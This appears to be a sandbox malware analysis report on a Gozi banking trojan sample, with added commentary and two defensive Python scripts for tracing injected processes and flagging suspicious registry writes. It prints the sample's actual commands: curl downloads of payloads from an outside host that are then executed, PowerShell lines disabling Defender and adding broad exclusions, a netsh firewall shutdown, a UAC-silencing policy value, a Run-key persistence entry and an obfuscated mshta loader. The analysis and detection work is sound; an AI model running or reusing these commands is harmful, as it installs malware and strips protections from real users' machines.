Malware Analysis Report

2025-08-05 13:07

Sample ID 220322-lnvc6aehb5
Target 98b082b4d65dfe4ee5b227575d1c08ef.png
SHA256 e7767ba8bcff3242dd32f880cb59894c3ce5615a2557504db976803cd246354e
Tags
gozi_ifsb 3000 banker evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

e7767ba8bcff3242dd32f880cb59894c3ce5615a2557504db976803cd246354e

Threat Level: Known bad

The file 98b082b4d65dfe4ee5b227575d1c08ef.png was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker evasion persistence trojan

UAC bypass

Gozi, Gozi IFSB

Modifies Windows Firewall

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of FindShellTrayWindow

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Discovers systems in the same network

Gathers system information

Suspicious behavior: GetForegroundWindowSpam

Runs net.exe

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

System policy modification

Suspicious use of SendNotifyMessage

Enumerates processes with tasklist

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-22 09:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-22 09:41

Reported

2022-03-22 09:46

Platform

win7-20220310-en

Max time kernel

4294183s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"

Signatures

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Identical rows
PID 1604 wrote to memory of 1032 | N/A | C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe | C:\Windows\SysWOW64\cmd.exe | 4
PID 1604 wrote to memory of 2044 | N/A | C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe | C:\Windows\SysWOW64\cmd.exe | 4
PID 1604 wrote to memory of 1660 | N/A | C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe | C:\Windows\SysWOW64\cmd.exe | 4
PID 1604 wrote to memory of 1136 | N/A | C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe | C:\Windows\SysWOW64\cmd.exe | 4
PID 1604 wrote to memory of 1132 | N/A | C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe | C:\Windows\SysWOW64\cmd.exe | 4

Processes

C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe

"C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c mkdir C:\Users\Admin\AppData\Roaming\EdgeData

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

Network

N/A. This Windows 7 run shows no network activity and no curl.exe child processes, and A.exe never appears as a running process, which is consistent with the cmd.exe /c curl ... downloads failing: curl.exe is not shipped with Windows 7, so the chain only continues in the Windows 10 run (behavioral2) below.

Files

memory/1132-54-0x00000000753C1000-0x00000000753C3000-memory.dmp

memory/1132-65-0x0000000000460000-0x0000000000461000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-22 09:41

Reported

2022-03-22 09:46

Platform

win10v2004-20220310-en

Max time kernel

151s

Max time network

154s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

UAC bypass

evasion trojan

Downloads MZ/PE file

Modifies Windows Firewall

evasion

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileOptions = "cmd /c start C:\\Users\\Admin\\FileOptions.lnk -ep unrestricted -file C:\\Users\\Admin\\DiagramClass.ps1" | C:\Windows\Explorer.EXE | N/A

The writer is Explorer.EXE, not the dropper: the SetThreadContext rows in this analysis show powershell.exe (PID 4616) setting the thread context of Explorer.EXE (PID 1048) before Explorer itself becomes the source of further context changes, so this Run value was written by injected code running inside the shell. The arguments after the .lnk (-ep unrestricted -file ...DiagramClass.ps1) are PowerShell's, so the shortcut presumably resolves to powershell.exe and runs the script with execution policy lowered at every logon.

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1768 set thread context of 620 | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
PID 4616 set thread context of 1048 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE
PID 1048 set thread context of 5004 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\cmd.exe
PID 1048 set thread context of 3440 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 1048 set thread context of 3740 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 5004 set thread context of 2144 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\PING.EXE
PID 1048 set thread context of 3428 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
PID 1048 set thread context of 392 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe
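The SetThreadContext rows above form an injection graph, and the question that matters for response is which system processes must be treated as compromised once powershell.exe has set the context of Explorer.EXE. As an added example, not code from this report or from any sandbox product, the Python below parses those rows in the flattened layout this page uses, finds the injection roots (sources that are never themselves a target) and walks the edges to list every downstream process with the path that reaches it. The row layout, the choice to treat every SetThreadContext edge as an injection, and the sample rows (copied from the table above) are the example's own assumptions.

```python
import re
from collections import deque

# Constructed sample: the SetThreadContext rows from the behavioral2 signature table,
# in the flattened "Description Indicator Process Target" layout this report uses.
SAMPLE_ROWS = [
    r"PID 1768 set thread context of 620 N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe",
    r"PID 4616 set thread context of 1048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE",
    r"PID 1048 set thread context of 5004 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe",
    r"PID 1048 set thread context of 3440 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe",
    r"PID 1048 set thread context of 3740 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe",
    r"PID 5004 set thread context of 2144 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE",
    r"PID 1048 set thread context of 3428 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe",
    r"PID 1048 set thread context of 392 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe",
]

ROW_RE = re.compile(r"^PID (\d+) set thread context of (\d+) N/A (\S+) (\S+)$")


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_edges(rows):
    """Return (edges, images): edges as (src_pid, dst_pid), images as pid -> image path."""
    edges, images = [], {}
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            raise ValueError(f"unparsed row: {row!r}")
        src, dst = int(m[1]), int(m[2])
        edges.append((src, dst))
        images.setdefault(src, m[3])
        images.setdefault(dst, m[4])
    return edges, images


def injection_roots(edges):
    """Sources that never appear as a SetThreadContext target: where each chain starts."""
    targets = {dst for _, dst in edges}
    return {src for src, _ in edges if src not in targets}


def downstream(edges, root):
    """Every pid reachable from root over injection edges, with the path that reaches it (BFS)."""
    children = {}
    for src, dst in edges:
        children.setdefault(src, []).append(dst)
    paths = {}
    queue = deque([(root, [root])])
    while queue:
        pid, path = queue.popleft()
        for child in children.get(pid, []):
            if child not in paths:
                paths[child] = path + [child]
                queue.append((child, paths[child]))
    return paths


def compromised_report(rows):
    """Map each injection root to the processes that must be treated as compromised."""
    edges, images = parse_edges(rows)
    report = {}
    for root in sorted(injection_roots(edges)):
        paths = downstream(edges, root)
        report[root] = {
            "image": images[root],
            "compromised": {pid: images[pid] for pid in paths},
            "paths": paths,
        }
    return report


if __name__ == "__main__":
    for root, info in compromised_report(SAMPLE_ROWS).items():
        print(f"root {root} ({basename(info['image'])}) compromises {len(info['compromised'])} process(es)")
        for pid, path in info["paths"].items():
            names = [basename(info["compromised"].get(p, info["image"])) for p in path]
            print("   ", " -> ".join(f"{p}:{n}" for p, n in zip(path, names)))
```

On the rows above this yields two roots: AutoIt3.exe (1768) hollowing its own child (620), and powershell.exe (4616), under which Explorer.EXE and everything Explorer then touched (four RuntimeBroker.exe instances, cmd.exe and the PING.EXE it spawned) have to be scoped as attacker-controlled; the RuntimeBroker.exe -Embedding command line at the top of this analysis is one of those injected instances.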

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description | Indicator | Process | Target | Identical rows
N/A | N/A | C:\Windows\system32\net.exe | N/A | 3

Enumerates processes with tasklist

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\tasklist.exe | N/A

Gathers system information

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A

Modifies system certificate store

evasion spyware trojan
Description | Indicator | Process | Target | Identical rows
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = <blob omitted> | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A | 2
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A | 1
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = <blob omitted> | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | N/A | 2

Caveat: D69B561148F01C77C54578C10926DF5B856976AD is the SHA-1 thumbprint of the public GlobalSign Root CA - R3, and AuthRoot\Certificates entries for public roots are also written by Windows' automatic root-certificate update the first time a process validates a chain that needs them. A user-profile binary triggering that write is worth noting, but on its own this hit is weak evidence of certificate-store tampering.

Runs net.exe

Runs ping.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\PING.EXE | N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\PING.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target | Identical rows
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 8
N/A | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | N/A | 2
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 2
N/A | N/A | C:\Windows\Explorer.EXE | N/A | 52

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target | Identical rows
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
N/A | N/A | C:\Windows\Explorer.EXE | N/A | 3
N/A | N/A | C:\Windows\System32\cmd.exe | N/A | 1
N/A | N/A | C:\Windows\Explorer.EXE | N/A | 2

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target | Identical rows
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A | 4
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A | 1
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A | 1
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A | 1
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A | 1
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A | 1
Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A | 1
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A | 2

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target | Identical rows
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A | 8
N/A | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | N/A | 2
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A | 23

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target | Identical rows
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A | 8
N/A | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | N/A | 2
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | N/A | 1
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A | 23

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target | Identical rows
PID 2504 wrote to memory of 4612 | N/A | C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe | C:\Windows\SysWOW64\cmd.exe | 3
PID 2504 wrote to memory of 4212 | N/A | C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe | C:\Windows\SysWOW64\cmd.exe | 3
PID 4212 wrote to memory of 3296 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\curl.exe | 3
PID 2504 wrote to memory of 2356 | N/A | C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe | C:\Windows\SysWOW64\cmd.exe | 3
PID 2356 wrote to memory of 448 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\curl.exe | 3
PID 2504 wrote to memory of 3684 | N/A | C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe | C:\Windows\SysWOW64\cmd.exe | 3
PID 3684 wrote to memory of 3140 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\curl.exe | 3
PID 2504 wrote to memory of 4012 | N/A | C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe | C:\Windows\SysWOW64\cmd.exe | 3
PID 4012 wrote to memory of 4896 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | 3
PID 4896 wrote to memory of 3792 | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | C:\Windows\System32\cmd.exe | 2
PID 3792 wrote to memory of 960 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\curl.exe | 2
PID 4896 wrote to memory of 1692 | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | C:\Windows\System32\cmd.exe | 2
PID 1692 wrote to memory of 3948 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\curl.exe | 2
PID 4896 wrote to memory of 3036 | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | C:\Windows\System32\cmd.exe | 2
PID 3036 wrote to memory of 3608 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\curl.exe | 2
PID 4896 wrote to memory of 4228 | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | C:\Windows\System32\cmd.exe | 2
PID 4228 wrote to memory of 376 | N/A | C:\Windows\System32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | 3
PID 376 wrote to memory of 4728 | N/A | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | 3
PID 4896 wrote to memory of 3472 | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | C:\Windows\System32\cmd.exe | 2
PID 3472 wrote to memory of 1060 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\curl.exe | 2
PID 4896 wrote to memory of 484 | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\A.exe | C:\Windows\System32\cmd.exe | 2
PID 484 wrote to memory of 1768 | N/A | C:\Windows\System32\cmd.exe | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | 3
PID 1768 wrote to memory of 620 | N/A | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe | 5
PID 376 wrote to memory of 1328 | N/A | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | 3

Parent-to-child pairs with two or three writes (cmd.exe into curl.exe and so on) are the pattern of ordinary process creation and mostly document the process tree. The five writes from AutoIt3.exe PID 1768 into its own child AutoIt3.exe PID 620, paired with the SetThreadContext row for the same pair above, are the ones consistent with process hollowing.

System policy modification

evasion
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe | N/A

ConsentPromptBehaviorAdmin = 0 makes UAC elevate members of the Administrators group without any prompt, which is what the "UAC bypass" signature in this analysis refers to. Writing this HKLM policy already requires administrative rights (the sandbox runs the sample as an administrator), so the change silences later elevation prompts rather than obtaining the first elevation.
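The registry writes listed in this analysis (the Run key, the AuthRoot certificate entry, the UAC policy, and the Geo\Nation query) can be checked mechanically. As an added example that is not part of this report or of any sandbox's own code, the Python below parses rows in the flattened "Description Indicator Process Target" layout this page uses and tags each finding. The sample rows are copied from the tables above; the rule names, the "<blob omitted>" placeholder for the certificate data, the list of user-writable directories and the launcher pattern are assumptions of the example.

```python
import re
from dataclasses import dataclass

# Constructed sample: registry rows from the behavioral2 signature tables of this report,
# in the flattened "Description Indicator Process Target" layout the report uses.
SAMPLE_ROWS = [
    r'Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\EdgeData\A.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileOptions = "cmd /c start C:\\Users\\Admin\\FileOptions.lnk -ep unrestricted -file C:\\Users\\Admin\\DiagramClass.ps1" C:\Windows\Explorer.EXE N/A',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD C:\Users\Admin\AppData\Roaming\EdgeData\A.exe N/A',
    r'Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = <blob omitted> C:\Users\Admin\AppData\Roaming\EdgeData\A.exe N/A',
    r'Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A',
]

# op, registry path, optional `= value` (quoted, <placeholder> or bare), process image, target.
ROW_RE = re.compile(
    r'^(?P<op>Set value \(\w+\)|Key created|Key value queried)\s+'
    r'(?P<path>\\REGISTRY\\.+?)'
    r'(?:\s=\s(?P<value>"[^"]*"|<[^>]*>|\S+))?'
    r'\s+(?P<process>[A-Za-z]:\\\S+)\s+(?P<target>\S+)$'
)

# Assumption of the example: binaries running from these locations are untrusted.
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\")
# Run values that launch a script host or lower PowerShell's execution policy.
LAUNCHER_RE = re.compile(r"-ep\s+unrestricted|-executionpolicy\s+bypass|\.ps1\b|\.lnk\b|mshta|wscript|\.hta\b", re.I)


@dataclass
class Finding:
    rule: str
    process: str
    detail: str


def parse_row(row):
    m = ROW_RE.match(row)
    if not m:
        raise ValueError(f"unparsed row: {row!r}")
    ev = m.groupdict()
    if ev["value"] is not None:
        ev["value"] = ev["value"].strip('"')
    return ev


def from_user_writable(image):
    low = image.lower()
    return any(p in low for p in USER_WRITABLE)


def check_row(ev):
    path, value, proc = ev["path"].lower(), ev["value"], ev["process"]
    found = []
    if ev["op"].startswith("Set value") and "\\currentversion\\run\\" in path:
        name = path.rsplit("\\", 1)[-1]
        found.append(Finding("persistence.run_key", proc, f"{name} = {value}"))
        if value and LAUNCHER_RE.search(value):
            found.append(Finding("persistence.run_key_script_launcher", proc, value))
    if path.endswith("\\policies\\system\\consentpromptbehavioradmin") and value == "0":
        found.append(Finding("uac.prompt_disabled", proc, "ConsentPromptBehaviorAdmin=0"))
    if path.endswith("\\policies\\system\\enablelua") and value == "0":
        found.append(Finding("uac.disabled", proc, "EnableLUA=0"))
    if "\\systemcertificates\\authroot\\certificates\\" in path and from_user_writable(proc):
        thumb = path.split("\\certificates\\")[1].split("\\")[0]
        found.append(Finding("certstore.authroot_write_by_userland_binary", proc, thumb))
    if path.endswith("\\control panel\\international\\geo\\nation") and from_user_writable(proc):
        found.append(Finding("discovery.geo_nation_check", proc, ""))
    return found


def scan(rows):
    findings = []
    for row in rows:
        findings.extend(check_row(parse_row(row)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_ROWS):
        print(f"{f.rule:45} {f.process}  {f.detail}")
```

The Run-key rule deliberately does not require the writer to live in a user-writable directory: on this page the writer is C:\Windows\Explorer.EXE, and a rule that trusted Windows binaries would miss exactly the injected-shell case. The AuthRoot rule, by contrast, only fires for user-profile binaries and should be scored low for the reason given under the certificate table.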

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe

"C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c mkdir C:\Users\Admin\AppData\Roaming\EdgeData

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

C:\Windows\SysWOW64\curl.exe

curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll

C:\Windows\SysWOW64\curl.exe

curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest

C:\Windows\SysWOW64\curl.exe

curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest

C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/AutoIt3.exe --output AutoIt3.exe

C:\Windows\system32\curl.exe

curl http://sincheats.com/gas/AutoIt3.exe --output AutoIt3.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/AutoIt3.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

C:\Windows\system32\curl.exe

curl http://sincheats.com/gas/AutoIt3.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/12/WD.au3 --output WD.au3

C:\Windows\system32\curl.exe

curl http://sincheats.com/gas/12/WD.au3 --output WD.au3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start AutoIt3.exe WD.au3

C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe

AutoIt3.exe WD.au3

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl http://sincheats.com/gas/12/run.au3 --output C:\Users\Admin\AppData\Roaming\EdgeData\run.au3

C:\Windows\system32\curl.exe

curl http://sincheats.com/gas/12/run.au3 --output C:\Users\Admin\AppData\Roaming\EdgeData\run.au3

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au3

C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\run.au3

C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe

"C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension ".exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" netsh advfirewall set allprofiles state off

C:\Windows\SysWOW64\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xnq8='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xnq8).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\F13BB3F3-9C04-4B57-2EB5-90AF42B9C453\\\DiagramClass'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

